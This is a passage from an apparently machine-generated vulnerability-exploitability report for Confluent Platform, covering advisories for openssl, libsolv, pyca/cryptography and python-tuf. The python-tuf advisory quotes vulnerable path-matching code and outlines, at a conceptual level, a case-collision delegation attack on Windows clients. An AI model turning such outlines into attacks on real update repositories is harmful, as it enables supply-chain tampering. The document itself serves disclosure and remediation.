          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481898"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-25237.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:25239"
        },
        {
          "url": "https://github.com/advisories/GHSA-q98x-73c3-57gj"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/05b066366842f930fadd9a6e94df98030af431bb"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/3d8d5bc1056b2f62da9fede23fedbf47e85187b0"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/715349a1d7c6db970e6815dafb90915f07307f98"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/77bf00ab13f6ff5e516535432f0328ed70ec0c26"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/eecbe330977e8d023aae1ca2d9bdbe983ef3fdc6"
        },
        {
          "url": "https://github.com/openssl/security/commit/05b066366842f930fadd9a6e94df98030af431bb"
        },
        {
          "url": "https://github.com/openssl/security/commit/3d8d5bc1056b2f62da9fede23fedbf47e85187b0"
        },
        {
          "url": "https://github.com/openssl/security/commit/715349a1d7c6db970e6815dafb90915f07307f98"
        },
        {
          "url": "https://github.com/openssl/security/commit/77bf00ab13f6ff5e516535432f0328ed70ec0c26"
        },
        {
          "url": "https://github.com/openssl/security/commit/eecbe330977e8d023aae1ca2d9bdbe983ef3fdc6"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-9076.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50379.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9076"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-9076"
        }
      ],
      "published": "2026-06-09T17:17:50+00:00",
      "updated": "2026-07-23T08:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-9149",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        122
      ],
      "description": "A flaw was found in libsolv. This heap buffer overflow vulnerability occurs when a victim processes a specially crafted `.solv` file containing negative size values in the `repo_add_solv` function. This leads to an undersized memory allocation and a subsequent out-of-bounds write. An attacker could exploit this to cause a denial of service (DoS).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-9149"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:21333"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28236"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:48818"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-9149"
        },
        {
          "url": "https://bugzilla.redhat.com/2460379"
        },
        {
          "url": "https://bugzilla.redhat.com/2460380"
        },
        {
          "url": "https://bugzilla.redhat.com/2460425"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460425"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-48864"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9149"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9150"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-28236.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:28236"
        },
        {
          "url": "https://github.com/openSUSE/libsolv/pull/617"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-9149.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-28236.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9149"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-9149"
        }
      ],
      "published": "2026-05-21T00:16:35+00:00",
      "updated": "2026-07-31T18:17:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.7.20-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libsolv@0.7.20-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "GHSA-537c-gmf6-5ccf",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "description": "pyca/cryptography's wheels include a statically linked copy of OpenSSL. The versions of OpenSSL included in wheels prior to cryptograph 48.01 are vulnerable to a security issue. More details about the vulnerability itself can be found in https://openssl-library.org/news/secadv/20260609.txt.\n\nIf you are building cryptography source (\"sdist\") then you are responsible for upgrading your copy of OpenSSL. Only users installing from wheels built by the cryptography project (i.e., those distributed on PyPI) need to update their cryptography versions.",
      "recommendation": "Upgrade cryptography to version 48.0.1",
      "advisories": [
        {
          "url": "https://github.com/advisories/GHSA-537c-gmf6-5ccf"
        },
        {
          "url": "https://github.com/pyca/cryptography"
        },
        {
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-537c-gmf6-5ccf"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        }
      ],
      "published": "2026-06-15T20:12:27+00:00",
      "updated": "2026-06-15T20:12:27+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/cryptography@46.0.7",
          "versions": [
            {
              "version": "46.0.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:pypi/cryptography@46.0.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. the flaw is the OpenSSL bundled inside the Python cryptography wheel; the product does not process attacker-controlled cryptographic input through that Python path, so the vulnerable code is not reachable."
      }
    },
    {
      "id": "GHSA-qp9x-wp8f-qgjj",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "description": "`DelegatedRole._is_target_in_pathpattern` uses `fnmatch.fnmatch` to decide whether a given target path is authorized by a delegation's glob pattern.\n\nPython's `fnmatch.fnmatch` calls `os.path.normcase()` on both arguments before matching. On POSIX hosts `normcase` is the identity function; on Windows hosts `os.path` resolves to `ntpath`, whose `normcase` lowercases its input and replaces `/` with `\\`.\n\nAs a result, python-tuf's delegation *path pattern* matching is case-sensitive on Linux/macOS but case-INSENSITIVE on Windows. This makes the authorization decision for a target dependent on the host operating system of the client running the updater.\n\nThe result on Windows is a TUF specification violation in the python-tuf `ngclient` implementation.\n\n## Vulnerable code\n\n`tuf/api/_payload.py` (HEAD `7ecb67d`):\n\n```python\n1183  @staticmethod\n1184  def _is_target_in_pathpattern(targetpath: str, pathpattern: str) -> bool:\n1185      \"\"\"Determine whether ``targetpath`` matches the ``pathpattern``.\"\"\"\n1186      # We need to make sure that targetpath and pathpattern are pointing to\n1187      # the same directory as fnmatch doesn't threat \"/\" as a special symbol.\n1188      target_parts = targetpath.split(\"/\")\n1189      pattern_parts = pathpattern.split(\"/\")\n1190      if len(target_parts) != len(pattern_parts):\n1191          return False\n1192\n1193      # Every part in the pathpattern could include a glob pattern, that's why\n1194      # each of the target and pathpattern parts should match.\n1195      for target, pattern in zip(target_parts, pattern_parts, strict=True):\n1196          if not fnmatch.fnmatch(target, pattern):\n1197              return False\n1198      return True\n```\n\n`fnmatch.fnmatch` source (Python 3.12, unchanged in current mainline):\n\n```python\ndef fnmatch(name, pat):\n    ...\n    name = os.path.normcase(name)\n    pat = os.path.normcase(pat)\n    return fnmatchcase(name, pat)\n```\n\n## Fix\n\nReplace `fnmatch.fnmatch` with `fnmatch.fnmatchcase`, which is explicitly documented as \"not applying case normalization\", so it behaves identically across platforms.\n\n## Attack\n\n1. A TUF repository with two path-based delegations whose patterns differ only in case \u2014 for example, `Foo/*` and `foo/*`.\n2. The \"attacker\" delegation is listed BEFORE the \"legit\" delegation in the delegation order.\n3. The client searches for `foo/something`: on Windows, it will find the \"attacker\" provided target \"Foo/something\".\n\n\n## Exploitability caveats \n\n* The attack needs a repository configuration with case-colliding delegation path patterns. The attacker must control one of the delegated roles.\n* Delegation ordering matters: the attacker-controlled role must be visited BEFORE the legit role in the pre-order walk.\n* The client must run on Windows. No effect on Linux/macOS.\n\n## Credit\n\nReporter: Koda Reef @kodareef5 \nAdvisory edits: Jussi Kukkonen @jku",
      "recommendation": "Upgrade tuf to version 7.0.0",
      "advisories": [
        {
          "url": "https://github.com/advisories/GHSA-qp9x-wp8f-qgjj"
        },
        {
          "url": "https://github.com/theupdateframework/python-tuf"
        },
        {
          "url": "https://github.com/theupdateframework/python-tuf/releases/tag/v7.0.0"
        },
        {
          "url": "https://github.com/theupdateframework/python-tuf/security/advisories/GHSA-qp9x-wp8f-qgjj"
        }
      ],
      "published": "2026-05-28T22:46:13+00:00",
      "updated": "2026-05-28T22:46:13+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/tuf@6.0.0",
          "versions": [
            {
              "version": "6.0.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:pypi/tuf@6.0.0"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:pypi/tuf@6.0.0"
        },
        {
